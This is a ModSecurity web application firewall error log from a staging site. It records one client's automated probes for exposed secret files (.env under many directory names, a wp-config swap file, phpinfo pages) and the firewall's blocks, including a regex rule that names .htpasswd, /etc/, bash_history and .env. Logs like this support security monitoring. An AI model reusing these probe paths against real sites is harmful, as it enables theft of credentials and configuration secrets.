[Tue May 26 15:30:58.692408 2026] [security2:error] [pid 715645:tid 715813] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSMwAAACY"]
[Tue May 26 15:30:58.707232 2026] [security2:error] [pid 715645:tid 715902] [client 195.178.110.199:41666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVvWnVGgMGh8k213RgSPwAAAH8"]
[Tue May 26 15:30:58.712116 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSNgAAAC4"]
[Tue May 26 15:30:58.755409 2026] [security2:error] [pid 715645:tid 715881] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSQAAAAGo"]
[Tue May 26 15:30:58.783412 2026] [security2:error] [pid 715645:tid 715854] [client 195.178.110.199:41660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/API/.env"] [unique_id "ahVvWnVGgMGh8k213RgSSAAAAE8"]
[Tue May 26 15:30:58.820673 2026] [security2:error] [pid 715645:tid 715899] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSRwAAAHw"]
[Tue May 26 15:30:58.839838 2026] [security2:error] [pid 715645:tid 715900] [client 195.178.110.199:41636] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSSQAAAH0"]
[Tue May 26 15:30:58.840977 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:41628] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSSgAAAFk"]
[Tue May 26 15:30:58.873597 2026] [security2:error] [pid 715645:tid 715824] [client 195.178.110.199:41706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/APP/.env"] [unique_id "ahVvWnVGgMGh8k213RgSTwAAADE"]
[Tue May 26 15:30:58.901744 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:41680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/BACK/.env"] [unique_id "ahVvWnVGgMGh8k213RgSUgAAADI"]
[Tue May 26 15:30:58.906519 2026] [security2:error] [pid 715645:tid 715861] [client 195.178.110.199:41642] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSTgAAAFY"]
[Tue May 26 15:30:58.938316 2026] [security2:error] [pid 715645:tid 715786] [client 195.178.110.199:41750] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/BACKEND/.env"] [unique_id "ahVvWnVGgMGh8k213RgSVwAAAAs"]
[Tue May 26 15:30:58.942231 2026] [security2:error] [pid 715645:tid 715793] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSUQAAABI"]
[Tue May 26 15:30:58.959964 2026] [security2:error] [pid 715645:tid 715787] [client 195.178.110.199:41744] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSVQAAAAw"]
[Tue May 26 15:30:58.967863 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:41626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/Api/.env"] [unique_id "ahVvWnVGgMGh8k213RgSWQAAAHI"]
[Tue May 26 15:30:58.989539 2026] [security2:error] [pid 715645:tid 715838] [client 195.178.110.199:41636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/Be/.env"] [unique_id "ahVvWnVGgMGh8k213RgSXQAAAD8"]
[Tue May 26 15:30:58.996959 2026] [security2:error] [pid 715645:tid 715886] [client 195.178.110.199:41746] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvWnVGgMGh8k213RgSWAAAAG8"]
[Tue May 26 15:30:59.046665 2026] [security2:error] [pid 715645:tid 715892] [client 195.178.110.199:41660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/BE/.env"] [unique_id "ahVvW3VGgMGh8k213RgSYQAAAHU"]
[Tue May 26 15:30:59.065294 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:41694] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/Backend/.env"] [unique_id "ahVvW3VGgMGh8k213RgSYwAAABU"]
[Tue May 26 15:30:59.080249 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSYAAAAEM"]
[Tue May 26 15:30:59.101795 2026] [security2:error] [pid 715645:tid 715797] [client 195.178.110.199:41678] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSYgAAABY"]
[Tue May 26 15:30:59.134398 2026] [security2:error] [pid 715645:tid 715867] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSZgAAAFw"]
[Tue May 26 15:30:59.157729 2026] [security2:error] [pid 715645:tid 715781] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSbAAAAAY"]
[Tue May 26 15:30:59.176883 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSbwAAAFE"]
[Tue May 26 15:30:59.178693 2026] [security2:error] [pid 715645:tid 715887] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSbgAAAHA"]
[Tue May 26 15:30:59.180985 2026] [security2:error] [pid 715645:tid 715834] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgScgAAADs"]
[Tue May 26 15:30:59.196000 2026] [security2:error] [pid 715645:tid 715828] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSdQAAADU"]
[Tue May 26 15:30:59.219653 2026] [security2:error] [pid 715645:tid 715817] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSewAAACo"]
[Tue May 26 15:30:59.220283 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSeAAAAGw"]
[Tue May 26 15:30:59.228537 2026] [security2:error] [pid 715645:tid 715868] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSfwAAAF0"]
[Tue May 26 15:30:59.251219 2026] [security2:error] [pid 715645:tid 715814] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgShAAAACc"]
[Tue May 26 15:30:59.272776 2026] [security2:error] [pid 715645:tid 715874] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgShwAAAGM"]
[Tue May 26 15:30:59.300306 2026] [security2:error] [pid 715645:tid 715805] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSigAAAB4"]
[Tue May 26 15:30:59.300852 2026] [security2:error] [pid 715645:tid 715798] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSjQAAABc"]
[Tue May 26 15:30:59.347991 2026] [security2:error] [pid 715645:tid 715818] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSkAAAACs"]
[Tue May 26 15:30:59.369374 2026] [security2:error] [pid 715645:tid 715900] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSlAAAAH0"]
[Tue May 26 15:30:59.374003 2026] [security2:error] [pid 715645:tid 715824] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSlgAAADE"]
[Tue May 26 15:30:59.418665 2026] [security2:error] [pid 715645:tid 715838] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSmgAAAD8"]
[Tue May 26 15:30:59.430310 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSmQAAAHI"]
[Tue May 26 15:30:59.484705 2026] [security2:error] [pid 715645:tid 715848] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSngAAAEk"]
[Tue May 26 15:30:59.499204 2026] [security2:error] [pid 715645:tid 715836] [client 195.178.110.199:41678] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSoAAAAD0"]
[Tue May 26 15:30:59.510148 2026] [security2:error] [pid 715645:tid 715808] [client 195.178.110.199:41642] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSogAAACE"]
[Tue May 26 15:30:59.527100 2026] [security2:error] [pid 715645:tid 715806] [client 195.178.110.199:41626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVvW3VGgMGh8k213RgSrAAAAB8"]
[Tue May 26 15:30:59.545307 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSqAAAAFI"]
[Tue May 26 15:30:59.589238 2026] [security2:error] [pid 715645:tid 715775] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSsgAAAAA"]
[Tue May 26 15:30:59.596428 2026] [security2:error] [pid 715645:tid 715781] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSqwAAAAY"]
[Tue May 26 15:30:59.597965 2026] [security2:error] [pid 715645:tid 715887] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSswAAAHA"]
[Tue May 26 15:30:59.620553 2026] [security2:error] [pid 715645:tid 715782] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSuAAAAAc"]
[Tue May 26 15:30:59.625070 2026] [security2:error] [pid 715645:tid 715813] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSuwAAACY"]
[Tue May 26 15:30:59.637254 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSvgAAABw"]
[Tue May 26 15:30:59.647574 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSwgAAAGw"]
[Tue May 26 15:30:59.670726 2026] [security2:error] [pid 715645:tid 715870] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSxAAAAF8"]
[Tue May 26 15:30:59.704526 2026] [security2:error] [pid 715645:tid 715819] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSyQAAACw"]
[Tue May 26 15:30:59.718605 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgSzQAAAHs"]
[Tue May 26 15:30:59.739350 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:41788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/admin-app/.env"] [unique_id "ahVvW3VGgMGh8k213RgS0QAAAAM"]
[Tue May 26 15:30:59.778197 2026] [security2:error] [pid 715645:tid 715837] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgS0AAAAD4"]
[Tue May 26 15:30:59.790298 2026] [security2:error] [pid 715645:tid 715871] [client 195.178.110.199:41738] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgS0gAAAGA"]
[Tue May 26 15:30:59.808478 2026] [security2:error] [pid 715645:tid 715784] [client 195.178.110.199:41706] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgS0wAAAAk"]
[Tue May 26 15:30:59.810443 2026] [security2:error] [pid 715645:tid 715809] [client 195.178.110.199:41636] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgS1AAAACI"]
[Tue May 26 15:30:59.827752 2026] [security2:error] [pid 715645:tid 715885] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvW3VGgMGh8k213RgS1wAAAG4"]
[Tue May 26 15:30:59.867122 2026] [security2:error] [pid 715645:tid 715831] [client 195.178.110.199:41678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVvW3VGgMGh8k213RgS2wAAADg"]
[Tue May 26 15:30:59.868249 2026] [security2:error] [pid 715645:tid 715786] [client 195.178.110.199:41674] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/administrator/.env"] [unique_id "ahVvW3VGgMGh8k213RgS3AAAAAs"]
